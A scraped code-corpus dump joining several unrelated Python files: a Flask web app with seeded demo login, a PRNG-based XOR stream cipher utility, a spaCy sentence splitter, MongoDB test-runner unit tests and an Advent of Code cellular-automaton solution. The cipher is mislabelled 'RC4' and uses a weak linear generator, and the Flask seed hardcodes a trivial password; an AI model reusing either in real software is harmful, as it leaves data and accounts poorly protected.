    id = db.Column(db.Integer, primary_key=True)
    email = db.Column(db.String(255), unique=True)
    password = db.Column(db.String(255))
    active = db.Column(db.Boolean())
    confirmed_at = db.Column(db.DateTime())
    roles = db.relationship('Role', secondary=roles_users, backref=db.backref('users', lazy='dynamic'))
# Flask-Security wiring: SQLAlchemy-backed user/role store plus an admin view.
user_datastore = SQLAlchemyUserDatastore(db, User, Role)
security = Security(app, user_datastore)
admin.add_view(ModelView(User, db.session))
def create_user():
    """Create all tables and seed one demo account.

    NOTE(review): hardcoded demo credentials -- do not use in production.
    """
    db.create_all()
    user_datastore.create_user(email='heeyeon@gmail.net', password='password')
    db.session.commit()
# Views
@app.route('/login')
@login_required
def home():
    """Login-protected landing page."""
    return render_template('index.html')
@app.route('/')
def index():
    """Public landing page showing the current UTC time."""
    now = datetime.utcnow()
    return render_template('index.html', dt=now)
@app.route('/graph')
def graph():
    """Render a plot built by the local ``data`` module.

    ``plotdata`` returns a (script, div) pair -- presumably Bokeh embed
    components (TODO confirm against the data module).
    """
    from data import plotdata
    script, div = plotdata()
    return render_template('graph.html', script=script, div=div)
@app.route('/0703', methods=['GET', 'POST'])
def hello_0703():
    """Class-notes page for 2018-07-03."""
    return render_template('0703.html', dt=datetime(2018, 7, 3))
@app.route('/0705', methods=['GET', 'POST'])
def hello_0705():
    """Class-notes page for 2018-07-05."""
    return render_template('0705.html', dt=datetime(2018, 7, 5))
@app.route('/0709', methods=['GET', 'POST'])
def hello_0709():
    """Class-notes page for 2018-07-09."""
    return render_template('0709.html', dt=datetime(2018, 7, 9))
@app.route('/0717', methods=['GET', 'POST'])
def hello_0717():
    """Class-notes page for 2018-07-17."""
    return render_template('0717.html', dt=datetime(2018, 7, 17))
@app.route('/0718', methods=['GET', 'POST'])
def hello_0718():
    """Class-notes page for 2018-07-18."""
    return render_template('0718.html', dt=datetime(2018, 7, 18))
@app.route('/search', methods=['GET', 'POST'])
def search():
    """Render the search form.

    NOTE(review): the GET branch calls validate_on_submit(), which only
    succeeds on POST, so the index.html return looks unreachable --
    confirm the intended flow.
    """
    form = MyForm()
    if request.method == 'GET':  # with GET the password would be fully visible, so POST must be used
        if form.validate_on_submit():
            return render_template('index.html')
        # print(a)
        # b = request.args['a']
        # print(b)
        # c = request.args.a
        # print(c)
        return render_template('search.html', form2=form)
    else:
        return render_template('search.html', form2=form)  # name used in the template = name used in Python (keeping them identical is recommended)
@app.route('/form', methods=['GET', 'POST'])
def pandas_index():
    """Render an HTML table for the column named by the ``name`` query param.

    NOTE(review): writes to a hardcoded absolute path specific to the
    author's machine -- this breaks on any other host; parameterize it.
    The local import below also shadows this view function's own name.
    """
    name = request.args.get('name')
    from pandas_ import pandas_index
    data = pandas_index()
    data2 = data[[name]]
    data2.to_html('/Users/limheeyeon/PycharmProjects/0727/templates/hhhh.html')
    return render_template('hhhh.html')
@app.route('/booking')
def booking():
return render_template('booking.html')
@app.route('/map')
def googlemap():
    """Render a full-screen Google map with two fixed Korean city markers."""
    sndmap = Map(
        identifier="sun",
        lat=37.5665,        # map centre: Seoul
        lng=126.9780,
        zoom=7,
        style=(
            "height:100%;"
            "width:100%;"
            "top:64;"
            "left:0;"
            "position:absolute;"
            "z-index:200;"
        ),
        language='ko',
        markers=[
            {
                'icon': 'http://maps.google.com/mapfiles/ms/icons/red-dot.png',
                'lat': 37.751855,
                'lng': 128.876057,
                'infobox': "<h1>강릉</h1>"
            },
            {
                'icon': 'http://maps.google.com/mapfiles/ms/icons/blue-dot.png',
                'lat': 35.3744136,
                'lng': 127.13759,
                'infobox': "<h1>순창</h1>"
            }
        ]
    )
    return render_template('map.html', sndmap=sndmap)
@app.route('/crime')
def crime_map():
    """Render a map of crime locations; markers come from crime.pandas_index2()."""
    from crime import pandas_index2
    marker = pandas_index2()
    sndmap = Map(
        identifier="sun",
        lat=39.72606,       # map centre: Denver area
        lng=-104.949973,
        style=(
            "height:100%;"
            "width:100%;"
            "top:64;"
            "left:0;"
            "position:absolute;"
            "z-index:200;"
        ),
        language='ko',
        markers=marker
    )
    return render_template('map1.html', sndmap=sndmap)
# Start the Flask development server when run as a script.
if __name__ == '__main__':
    app.run()
| gmldusdkwk/Big-Data | 0727/app.py | app.py | py | 5,629 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "flask_moment.Moment",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "flask_sqlalchemy.SQLAlchemy",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "flask_goo... |
35580246140 | import sys
import datetime
import os
class StreamCipherUtil:
    """Stream cipher driven by a Park-Miller ("minimal standard") PRNG.

    The key is hashed to a 31-bit seed; each plaintext character is XOR-ed
    with the next 8 pseudo-random bits. Because XOR is its own inverse,
    running the same key over the ciphertext decrypts it again.
    """

    def __init__(self, input_file, output_file, key):
        self.key = key                      # key material (sequence of ints)
        self.output_file = output_file
        self.input_file = input_file
        self.exec_time = None               # set once crypt_stream() is exhausted
        self.text_len = 0                   # characters written so far
        self.bit_stream = self._pm_rand()   # infinite generator of '0'/'1'
        self.bit_len = 8                    # keystream bits consumed per char
        self.file_text_len = os.stat(self.input_file).st_size

    @staticmethod
    def progress_bar(count, total, suffix=''):
        """Render a simple in-place text progress bar on stdout."""
        bar_len = 60
        total = float(total) or 1.0  # guard: an empty input file would divide by zero
        filled_len = int(round(bar_len * count / total))
        percents = round(100.0 * count / total, 1)
        bar = '=' * filled_len + '-' * (bar_len - filled_len)
        sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', suffix))
        sys.stdout.flush()

    def _pm_rand(self):
        """Yield an endless stream of '0'/'1' bits from a Park-Miller LCG."""
        IA = 16807           # multiplier of the minimal-standard generator
        IM = 2147483647      # modulus 2**31 - 1 (a Mersenne prime)
        threshold = (2 ** 31 - 1) // 2  # midpoint: below -> '0', above -> '1'
        prev_value = IA * self.hash_key() % IM
        while True:
            prev_value = IA * prev_value % IM
            yield '0' if prev_value < threshold + 1 else '1'

    def gen_custom_prng_bit_seq(self):
        """Collect the next ``bit_len`` keystream bits and return them as an int."""
        bit_seq = "".join(next(self.bit_stream) for _ in range(self.bit_len))
        return int(bit_seq, 2)

    def crypt_stream(self, text_stream):
        """Lazily XOR every character with the keystream (encrypt == decrypt)."""
        start = datetime.datetime.now()
        for ch in text_stream:
            yield chr(ord(ch) ^ self.gen_custom_prng_bit_seq())
        stop = datetime.datetime.now()
        # Only available after the generator has been fully consumed.
        self.exec_time = stop - start

    def hash_key(self):
        """Reduce the key to a deterministic 31-bit integer seed via SHA-256."""
        import hashlib
        return int(hashlib.sha256(str(self.key).encode('utf-16')).hexdigest(), 16) % (2 ** 31 - 1)

    def read_from_file(self):
        """Return the whole input file as one string."""
        # The `with` block closes the file; no explicit close() needed.
        with open(self.input_file, 'r', newline='') as f:
            return f.read()

    def write_to_file(self, text):
        """Write the (lazily produced) characters to the output file with progress."""
        with open(self.output_file, 'w', newline='') as f:
            for index, ch in enumerate(text):
                f.write(ch)
                self.progress_bar(index, self.file_text_len)
                self.text_len += 1
if __name__ == '__main__':
print("RC4 Encryption/Decryption utility.\n")
while True:
try:
mode = int(input("Choose mode: \n1. Encryption\n2. Decryption\nEnter mode: "))
input_filename = input("Enter input filename: ")
output_filename = input("Enter output filename: ")
key = input("Enter key [0-9a-zA-Zа-яА-Я]: ")
s = StreamCipherUtil(key=[ord(ch) for ch in key], input_file=input_filename,
output_file=output_filename)
data_stream = s.read_from_file()
new_data_stream = None
if mode is 1:
new_data_stream = s.crypt_stream(data_stream)
elif mode is 2:
new_data_stream = s.crypt_stream(data_stream)
s.write_to_file(new_data_stream)
print("\nTime {0} chars/ms".format((s.exec_time.seconds*10**6+s.exec_time.microseconds)/s.text_len))
except KeyboardInterrupt:
print("\nQuit utility.Bye!\n")
break
except ValueError as e:
print("\nError occured! {0}\n".format(e.args)) | Kamkas/Stream-cipher | lab2.py | lab2.py | py | 3,322 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.stat",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sys.stdout.write",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "sys.stdout",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "sys.stdout.flush",
"line... |
import spacy

# Load the English language model
nlp = spacy.load('en_core_web_sm')

# Load the scraped text from the file. An explicit encoding avoids
# platform-dependent decoding errors on scraped web content.
with open('website_text.txt', 'r', encoding='utf-8') as f:
    text = f.read()

# Process the text with spaCy
doc = nlp(text)

# Extract the sentences, trimming surrounding whitespace from each.
sentences = [sent.text.strip() for sent in doc.sents]
print(sentences)
| anupshrestha7171/FinalTaskOnMentorFriends | Qn2.py | Qn2.py | py | 341 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "spacy.load",
"line_number": 4,
"usage_type": "call"
}
] |
36840712959 | """Unit tests for the resmokelib.testing.executor module."""
import logging
import threading
import unittest
import mock
from opentelemetry.context.context import Context
from buildscripts.resmokelib import errors
from buildscripts.resmokelib.testing import job
from buildscripts.resmokelib.testing import queue_element
from buildscripts.resmokelib.testing.fixtures import interface as _fixtures
from buildscripts.resmokelib.testing.fixtures.fixturelib import FixtureLib
from buildscripts.resmokelib.utils import queue as _queue
# pylint: disable=protected-access
class TestJob(unittest.TestCase):
    """Tests for Job._run's repeat-count / repeat-time scheduling logic.

    Each test queues the same two mock tests, replaces the job's clock with
    a MockTime that advances by a fixed step per call, and asserts how many
    times every test was executed.
    """

    TESTS = ["jstests/core/and.js", "jstests/core/or.js"]

    @staticmethod
    def mock_testcase(test_name):
        # Minimal stand-in for a resmoke test case object.
        testcase = mock.Mock()
        testcase.test_name = test_name
        testcase.REGISTERED_NAME = "js_test"
        testcase.logger = logging.getLogger("job_unittest")
        return testcase

    @staticmethod
    def mock_interrupt_flag():
        # A flag that always reports "not set", so runs are never interrupted.
        interrupt_flag = mock.Mock()
        interrupt_flag.is_set = lambda: False
        return interrupt_flag

    @staticmethod
    def get_suite_options(num_repeat_tests=None, time_repeat_tests_secs=None,
                          num_repeat_tests_min=None, num_repeat_tests_max=None):
        # Mock suite options carrying only the repeat-related settings.
        suite_options = mock.Mock()
        suite_options.num_repeat_tests = num_repeat_tests
        suite_options.time_repeat_tests_secs = time_repeat_tests_secs
        suite_options.num_repeat_tests_min = num_repeat_tests_min
        suite_options.num_repeat_tests_max = num_repeat_tests_max
        return suite_options

    @staticmethod
    def queue_tests(tests, queue, queue_elem_type, suite_options):
        # Wrap each test name in the given queue element type and enqueue it.
        for test in tests:
            queue_elem = queue_elem_type(TestJob.mock_testcase(test), {}, suite_options)
            queue.put(queue_elem)

    @staticmethod
    def expected_run_num(time_repeat_tests_secs, test_time_secs):
        """Return the number of times a test is expected to run."""
        return time_repeat_tests_secs / test_time_secs

    def test__run_num_repeat(self):
        # Fixed repeat count: every test runs exactly num_repeat_tests times.
        num_repeat_tests = 1
        queue = _queue.Queue()
        suite_options = self.get_suite_options(num_repeat_tests=num_repeat_tests)
        mock_time = MockTime(1)
        job_object = UnitJob(suite_options)
        self.queue_tests(self.TESTS, queue, queue_element.QueueElem, suite_options)
        job_object._get_time = mock_time.time
        job_object._run(queue, self.mock_interrupt_flag())
        self.assertEqual(job_object.total_test_num, num_repeat_tests * len(self.TESTS))
        for test in self.TESTS:
            self.assertEqual(job_object.tests[test], num_repeat_tests)

    def test__run_time_repeat_time_no_min_max(self):
        # Time budget only: tests repeat until time_repeat_tests_secs elapses.
        increment = 1
        time_repeat_tests_secs = 10
        expected_tests_run = self.expected_run_num(time_repeat_tests_secs, increment)
        queue = _queue.Queue()
        suite_options = self.get_suite_options(time_repeat_tests_secs=time_repeat_tests_secs)
        mock_time = MockTime(increment)
        job_object = UnitJob(suite_options)
        self.queue_tests(self.TESTS, queue, queue_element.QueueElemRepeatTime, suite_options)
        job_object._get_time = mock_time.time
        job_object._run(queue, self.mock_interrupt_flag())
        self.assertEqual(job_object.total_test_num, expected_tests_run * len(self.TESTS))
        for test in self.TESTS:
            self.assertEqual(job_object.tests[test], expected_tests_run)

    def test__run_time_repeat_time_no_min(self):
        # Time budget with only a max bound; the max must not be reached.
        increment = 1
        time_repeat_tests_secs = 10
        num_repeat_tests_max = 100
        expected_tests_run = self.expected_run_num(time_repeat_tests_secs, increment)
        queue = _queue.Queue()
        suite_options = self.get_suite_options(time_repeat_tests_secs=time_repeat_tests_secs,
                                               num_repeat_tests_max=num_repeat_tests_max)
        mock_time = MockTime(increment)
        job_object = UnitJob(suite_options)
        self.queue_tests(self.TESTS, queue, queue_element.QueueElemRepeatTime, suite_options)
        job_object._get_time = mock_time.time
        job_object._run(queue, self.mock_interrupt_flag())
        self.assertLess(job_object.total_test_num, num_repeat_tests_max * len(self.TESTS))
        for test in self.TESTS:
            self.assertEqual(job_object.tests[test], expected_tests_run)

    def test__run_time_repeat_time_no_max(self):
        # Time budget with only a min bound; the min must be exceeded.
        increment = 1
        time_repeat_tests_secs = 10
        num_repeat_tests_min = 1
        expected_tests_run = self.expected_run_num(time_repeat_tests_secs, increment)
        queue = _queue.Queue()
        suite_options = self.get_suite_options(time_repeat_tests_secs=time_repeat_tests_secs,
                                               num_repeat_tests_min=num_repeat_tests_min)
        mock_time = MockTime(increment)
        job_object = UnitJob(suite_options)
        self.queue_tests(self.TESTS, queue, queue_element.QueueElemRepeatTime, suite_options)
        job_object._get_time = mock_time.time
        job_object._run(queue, self.mock_interrupt_flag())
        self.assertGreater(job_object.total_test_num, num_repeat_tests_min * len(self.TESTS))
        for test in self.TESTS:
            self.assertEqual(job_object.tests[test], expected_tests_run)

    def test__run_time_repeat_time(self):
        # Time budget with loose min/max bounds: the budget decides the count.
        increment = 1
        time_repeat_tests_secs = 10
        num_repeat_tests_min = 1
        num_repeat_tests_max = 100
        expected_tests_run = self.expected_run_num(time_repeat_tests_secs, increment)
        queue = _queue.Queue()
        suite_options = self.get_suite_options(time_repeat_tests_secs=time_repeat_tests_secs,
                                               num_repeat_tests_min=num_repeat_tests_min,
                                               num_repeat_tests_max=num_repeat_tests_max)
        mock_time = MockTime(increment)
        job_object = UnitJob(suite_options)
        self.queue_tests(self.TESTS, queue, queue_element.QueueElemRepeatTime, suite_options)
        job_object._get_time = mock_time.time
        job_object._run(queue, self.mock_interrupt_flag())
        self.assertGreater(job_object.total_test_num, num_repeat_tests_min * len(self.TESTS))
        self.assertLess(job_object.total_test_num, num_repeat_tests_max * len(self.TESTS))
        for test in self.TESTS:
            self.assertEqual(job_object.tests[test], expected_tests_run)

    def test__run_time_repeat_min(self):
        # Short time budget: the min repeat count keeps tests running longer.
        increment = 1
        time_repeat_tests_secs = 2
        num_repeat_tests_min = 3
        num_repeat_tests_max = 100
        queue = _queue.Queue()
        suite_options = self.get_suite_options(time_repeat_tests_secs=time_repeat_tests_secs,
                                               num_repeat_tests_min=num_repeat_tests_min,
                                               num_repeat_tests_max=num_repeat_tests_max)
        mock_time = MockTime(increment)
        job_object = UnitJob(suite_options)
        self.queue_tests(self.TESTS, queue, queue_element.QueueElemRepeatTime, suite_options)
        job_object._get_time = mock_time.time
        job_object._run(queue, self.mock_interrupt_flag())
        self.assertEqual(job_object.total_test_num, num_repeat_tests_min * len(self.TESTS))
        for test in self.TESTS:
            self.assertEqual(job_object.tests[test], num_repeat_tests_min)

    def test__run_time_repeat_max(self):
        # Long time budget: the max repeat count stops tests early.
        increment = 1
        time_repeat_tests_secs = 30
        num_repeat_tests_min = 1
        num_repeat_tests_max = 10
        expected_time_repeat_tests = self.expected_run_num(time_repeat_tests_secs, increment)
        queue = _queue.Queue()
        suite_options = self.get_suite_options(time_repeat_tests_secs=time_repeat_tests_secs,
                                               num_repeat_tests_min=num_repeat_tests_min,
                                               num_repeat_tests_max=num_repeat_tests_max)
        mock_time = MockTime(increment)
        job_object = UnitJob(suite_options)
        self.queue_tests(self.TESTS, queue, queue_element.QueueElemRepeatTime, suite_options)
        job_object._get_time = mock_time.time
        job_object._run(queue, self.mock_interrupt_flag())
        self.assertEqual(job_object.total_test_num, num_repeat_tests_max * len(self.TESTS))
        for test in self.TESTS:
            self.assertEqual(job_object.tests[test], num_repeat_tests_max)
            self.assertLess(job_object.tests[test], expected_time_repeat_tests)
class MockTime(object):
    """Stand-in for ``time.time`` that advances by a fixed step per call."""

    def __init__(self, increment):
        """Remember the step size and start the fake clock at zero."""
        self._increment = increment
        self._time = 0

    def time(self):
        """Return the current fake time, then advance the clock one step."""
        now = self._time
        self._time = now + self._increment
        return now
class UnitJob(job.Job):
    """Job subclass that counts executions instead of running real tests."""

    def __init__(self, suite_options):
        super(UnitJob, self).__init__(0, logging.getLogger("job_unittest"), None, [], None, None,
                                      suite_options, logging.getLogger("job_unittest"))
        self.total_test_num = 0  # total number of test executions observed
        self.tests = {}          # test name -> execution count

    def _execute_test(self, test, hook_failure_flag=None):
        # Record the execution rather than actually running the test case.
        self.total_test_num += 1
        if test.test_name not in self.tests:
            self.tests[test.test_name] = 0
        self.tests[test.test_name] += 1
class TestFixtureSetupAndTeardown(unittest.TestCase):
    """Test cases for error handling around setup_fixture() and teardown_fixture()."""

    def setUp(self):
        logger = logging.getLogger("job_unittest")
        # Job with no real fixture/hooks/report; only the manager's
        # setup/teardown entry points are exercised (mocked below).
        self.__job_object = job.Job(job_num=0, logger=logger, fixture=None, hooks=[], report=None,
                                    archival=None, suite_options=None, test_queue_logger=logger)
        self.__context = Context(trace_id=0, span_id=0, is_remote=False)
        # Initialize the Job instance such that its setup_fixture() and teardown_fixture() methods
        # always indicate success. The settings for these mocked method will be changed in the
        # individual test cases below.
        self.__job_object.manager.setup_fixture = mock.Mock(return_value=True)
        self.__job_object.manager.teardown_fixture = mock.Mock(return_value=True)

    def __assert_when_run_tests(self, setup_succeeded=True, teardown_succeeded=True):
        # Run the job with an empty queue and assert which flags got raised.
        queue = _queue.Queue()
        interrupt_flag = threading.Event()
        setup_flag = threading.Event()
        teardown_flag = threading.Event()
        self.__job_object(queue, interrupt_flag, self.__context, setup_flag, teardown_flag)
        self.assertEqual(setup_succeeded, not interrupt_flag.is_set())
        self.assertEqual(setup_succeeded, not setup_flag.is_set())
        self.assertEqual(teardown_succeeded, not teardown_flag.is_set())
        # teardown_fixture() should be called even if setup_fixture() raises an exception.
        self.__job_object.manager.setup_fixture.assert_called()
        self.__job_object.manager.teardown_fixture.assert_called()

    def test_setup_and_teardown_both_succeed(self):
        self.__assert_when_run_tests()

    def test_setup_returns_failure(self):
        self.__job_object.manager.setup_fixture.return_value = False
        self.__assert_when_run_tests(setup_succeeded=False)

    def test_setup_raises_logging_config_exception(self):
        # A known, resmoke-specific error type raised during setup.
        self.__job_object.manager.setup_fixture.side_effect = errors.LoggerRuntimeConfigError(
            "Logging configuration error intentionally raised in unit test")
        self.__assert_when_run_tests(setup_succeeded=False)

    def test_setup_raises_unexpected_exception(self):
        self.__job_object.manager.setup_fixture.side_effect = Exception(
            "Generic error intentionally raised in unit test")
        self.__assert_when_run_tests(setup_succeeded=False)

    def test_teardown_returns_failure(self):
        self.__job_object.manager.teardown_fixture.return_value = False
        self.__assert_when_run_tests(teardown_succeeded=False)

    def test_teardown_raises_logging_config_exception(self):
        self.__job_object.manager.teardown_fixture.side_effect = errors.LoggerRuntimeConfigError(
            "Logging configuration error intentionally raised in unit test")
        self.__assert_when_run_tests(teardown_succeeded=False)

    def test_teardown_raises_unexpected_exception(self):
        self.__job_object.manager.teardown_fixture.side_effect = Exception(
            "Generic error intentionally raised in unit test")
        self.__assert_when_run_tests(teardown_succeeded=False)
class TestNoOpFixtureSetupAndTeardown(unittest.TestCase):
    """Test cases for NoOpFixture handling in setup_fixture() and teardown_fixture()."""

    def setUp(self):
        self.logger = logging.getLogger("job_unittest")
        fixturelib = FixtureLib()
        # Real NoOpFixture, but with its setup/teardown replaced by mocks so
        # the tests can assert they were invoked by the job manager.
        self.__noop_fixture = _fixtures.NoOpFixture(logger=self.logger, job_num=0,
                                                    fixturelib=fixturelib)
        self.__noop_fixture.setup = mock.Mock()
        self.__noop_fixture.teardown = mock.Mock()

        # Report whose test lookups always claim a passing status.
        test_report = mock.Mock()
        test_report.find_test_info().status = "pass"

        self.__job_object = job.Job(job_num=0, logger=self.logger, fixture=self.__noop_fixture,
                                    hooks=[], report=test_report, archival=None, suite_options=None,
                                    test_queue_logger=self.logger)

    def test_setup_called_for_noop_fixture(self):
        self.assertTrue(self.__job_object.manager.setup_fixture(self.logger))
        self.__noop_fixture.setup.assert_called_once_with()

    def test_teardown_called_for_noop_fixture(self):
        self.assertTrue(self.__job_object.manager.teardown_fixture(self.logger))
        self.__noop_fixture.teardown.assert_called_once_with(finished=True)
| mongodb/mongo | buildscripts/tests/resmokelib/testing/test_job.py | test_job.py | py | 13,936 | python | en | code | 24,670 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "mock.Mock",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "mock.Mock",
"l... |
24340323309 | from PySide2.QtWidgets import QApplication
from PySide2.QtUiTools import QUiLoader
from PySide2.QtCore import QFile
import DCT,DFT,histogram_equalization,gray,nose,buguize,duishu,gamma,test_fenge,test_kuang,test_face3,junzhi
class Stats:
    """Main window: loads the Qt Designer UI and dispatches the selected
    image-processing operations when the run button is clicked."""

    def __init__(self):
        # NOTE(review): the QFile is opened and immediately closed before
        # being handed to QUiLoader; loader.load() reopens it via its file
        # name in practice -- confirm this behaves on all PySide2 versions.
        qufile_stats = QFile('GUI1.ui')
        qufile_stats.open(QFile.ReadOnly)
        qufile_stats.close()
        self.ui = QUiLoader().load(qufile_stats)
        self.ui.runButton.clicked.connect(self.run)

    def path(self):
        """Pop a file-open dialog and return the chosen image path."""
        from PySide2.QtWidgets import QFileDialog
        filePath, _ = QFileDialog.getOpenFileName(
            self.ui,  # parent window
            "选择你的图片",  # dialog title
            r"d:\\data",  # start directory
            "图片类型 (*.png *.jpg *.bmp)"  # file-type filter
        )
        return (filePath)

    def run(self):
        """Run every checked operation; each prompts for its own image file."""
        if self.ui.DCTButton.isChecked():
            DCT.DCT1(self.path())
        if self.ui.DFTButton.isChecked():
            DFT.DFT1(self.path())
        if self.ui.zhifangButton.isChecked():
            histogram_equalization.his_eq(self.path())
        if self.ui.noseButton.isChecked():
            nose.addnoise(self.path())
        if self.ui.grayButton.isChecked():
            gray.gray1(self.path())
        if self.ui.buguize.isChecked():
            buguize.buguize(self.path())
        if self.ui.duishu.isChecked():
            # Bug fix: this branch previously called buguize.buguize() -- a
            # copy-paste slip that left the imported duishu module unused.
            # Assumes duishu exposes duishu() like its sibling modules
            # (gamma.gamma, junzhi.junzhi, ...) -- confirm against duishu.py.
            duishu.duishu(self.path())
        if self.ui.gamma.isChecked():
            gamma.gamma(self.path())
        if self.ui.junzhi.isChecked():
            junzhi.junzhi(self.path())
        if self.ui.face.isChecked():
            test_face3.face(self.path())
        if self.ui.fenge.isChecked():
            test_fenge.fenge(self.path())
        if self.ui.kuang.isChecked():
            test_kuang.kuang(self.path())
# Create the Qt application, show the loaded UI, and enter the event loop.
app = QApplication([])
stats = Stats()
stats.ui.show()
app.exec_()
{
"api_name": "PySide2.QtCore.QFile",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "PySide2.QtCore.QFile.ReadOnly",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "PySide2.QtCore.QFile",
"line_number": 8,
"usage_type": "name"
},
{
"api_nam... |
17106762661 | import os
import copy
from typing import Set
from collections import defaultdict
# Read the puzzle input that sits next to this script; keep only
# non-empty, stripped lines.
inputPath = os.path.join(os.path.dirname(__file__), "input")
with open(inputPath, "r") as inputFile:
    lines = [line.strip() for line in inputFile.readlines() if line.strip()]
class Pos:
    """3-D integer grid position with value equality and hashing."""

    def __init__(self, x: int, y: int, z: int) -> None:
        self.x = x
        self.y = y
        self.z = z

    def neighbours(self, reach=1, includeSelf=False):
        """Yield every position within ``reach`` along each axis.

        The centre position itself is only produced when ``includeSelf`` is
        true. (The original duplicated the triple loop for both cases; a
        single loop with one condition yields the identical sequence.)
        """
        for zi in range(-reach, reach + 1):
            for yi in range(-reach, reach + 1):
                for xi in range(-reach, reach + 1):
                    if includeSelf or not (zi == 0 and yi == 0 and xi == 0):
                        yield Pos(self.x + xi, self.y + yi, self.z + zi)

    def __hash__(self) -> int:
        # Hash via the repr so equal positions hash equally.
        return hash(repr(self))

    def __eq__(self, o) -> bool:
        return self.x == o.x and self.y == o.y and self.z == o.z

    def __str__(self) -> str:
        return "(%s,%s,%s)" % (self.x, self.y, self.z)

    __repr__ = __str__
class HyperPos(Pos):
    """4-D integer grid position (adds a ``w`` axis to Pos)."""

    def __init__(self, x: int, y: int, z: int, w: int) -> None:
        super(HyperPos, self).__init__(x, y, z)
        self.w = w

    def neighbours(self, reach=1, includeSelf=False):
        """Yield every 4-D position within ``reach`` along each axis;
        include the centre only when ``includeSelf`` is true."""
        for zi in range(-reach, reach + 1):
            for yi in range(-reach, reach + 1):
                for xi in range(-reach, reach + 1):
                    for wi in range(-reach, reach + 1):
                        if includeSelf or not (zi == 0 and yi == 0 and xi == 0 and wi == 0):
                            yield HyperPos(self.x + xi, self.y + yi, self.z + zi, self.w + wi)

    def __hash__(self) -> int:
        return hash(repr(self))

    def __eq__(self, o) -> bool:
        return self.x == o.x and self.y == o.y and self.z == o.z and self.w == o.w

    def __str__(self) -> str:
        return "(%s,%s,%s,%s)" % (self.x, self.y, self.z, self.w)

    __repr__ = __str__
class Dimension:
    """Sparse 3-D Conway-cube dimension: only active cube positions are stored."""

    def __init__(self, cubes: Set[Pos]):
        self.cubes = cubes

    @staticmethod
    def FromLines(lines):
        """Build a dimension from a '#'/'.' character grid (z = 0 plane)."""
        cubes: Set[Pos] = set()
        for y, line in enumerate(lines):
            for x, char in enumerate(list(line)):
                if char == "#":
                    cubes.add(Pos(x, y, 0))
        return Dimension(cubes)

    def neighbourhood(self) -> Set[Pos]:
        """Return every position that is active or adjacent to an active cube."""
        neighbourhood = set()
        for cube in self.cubes:
            for neighbour in cube.neighbours(reach=1, includeSelf=True):
                neighbourhood.add(neighbour)
        return neighbourhood

    def isActive(self, pos: Pos) -> bool:
        return pos in self.cubes

    def neighboursActiveInRange(self, pos: Pos, min=None, max=None):
        """Return True if the count of active neighbours lies in [min, max].

        Bails out early as soon as the count exceeds ``max``. (Parameter
        names shadow the builtins but are kept for interface stability.)
        """
        activeNeighbours = 0
        for neighbour in pos.neighbours(reach=1):
            if self.isActive(neighbour):
                activeNeighbours += 1
                if activeNeighbours > max:
                    return False
        return activeNeighbours >= min

    def firstRule(self, cube: Pos) -> bool:
        """Return True if the cube shall be activated by the first rule:
        The cube must be active.
        If exactly 2 or 3 neighbors are active, the cube remains active.
        Otherwise, the cube becomes inactive.
        """
        assert self.isActive(cube)
        return self.neighboursActiveInRange(cube, min=2, max=3)

    def secondRule(self, cube: Pos) -> bool:
        """Return True if the cube shall be activated by the second rule:
        The cube must be inactive.
        If exactly 3 neighbors are active, the cube becomes active.
        Otherwise, the cube remains inactive.
        """
        assert not self.isActive(cube)
        return self.neighboursActiveInRange(cube, min=3, max=3)

    def layer(self, z: int) -> str:
        """Render the given z slice as a '#'/'.' grid.

        NOTE(review): sizing uses the module-level ``lines`` (the puzzle
        input), not the constructor argument -- works for this script only.
        """
        radius = len(lines[0]) * 2
        center = int((len(lines[0])) / 2)
        cubes = [["." for i in range(radius)] for i in range(radius)]
        for cube in [c for c in self.cubes if c.z == z]:
            cubes[cube.y + center][cube.x + center] = "#"
        return "\n".join("".join(c) for c in cubes)

    def cycle(self):
        """Advance one step: apply both activation rules simultaneously."""
        buffer = set()
        for pos in self.neighbourhood():
            rule = self.firstRule if self.isActive(pos) else self.secondRule
            if rule(pos):
                buffer.add(pos)
        # The freshly built set can be adopted directly; the original's
        # copy.deepcopy was a needless full copy of every Pos object.
        self.cubes = buffer
class HyperDimension(Dimension):
    """4-D variant of Dimension; cube positions carry a ``w`` coordinate.

    The original also duplicated Dimension.cycle verbatim; the inherited
    implementation is identical, so the override has been dropped.
    """

    @staticmethod
    def FromLines(lines):
        """Build a hyper-dimension from a '#'/'.' grid (z = w = 0 plane)."""
        cubes: Set[HyperPos] = set()
        for y, line in enumerate(lines):
            for x, char in enumerate(list(line)):
                if char == "#":
                    cubes.add(HyperPos(x, y, 0, 0))
        return HyperDimension(cubes)

    def layer(self, z: int, w: int) -> str:
        """Render the z/w slice as a '#'/'.' grid (sized, like
        Dimension.layer, from the module-level ``lines``)."""
        radius = len(lines[0]) * 2
        center = int((len(lines[0])) / 2)
        cubes = [["." for i in range(radius)] for i in range(radius)]
        for cube in [c for c in self.cubes if c.z == z and c.w == w]:
            cubes[cube.y + center][cube.x + center] = "#"
        return "\n".join("".join(c) for c in cubes)
def solve1():
    """Part 1: boot the 3-D dimension, run six cycles, count active cubes."""
    dim = Dimension.FromLines(lines)
    print(dim.layer(0))
    for _ in range(6):  # the puzzle asks for exactly six boot cycles
        dim.cycle()
    return len(dim.cubes)
def solve2():
    """Part 2: same as part 1 but in four dimensions."""
    dim = HyperDimension.FromLines(lines)
    print(dim.layer(0, 0))
    for _ in range(6):  # six boot cycles, as in part 1
        dim.cycle()
    return len(dim.cubes)
# Print the answers for both puzzle parts.
print(solve1())
print(solve2())
| mmmaxou/advent-of-code | 2020/day-17/answer.py | answer.py | py | 6,664 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
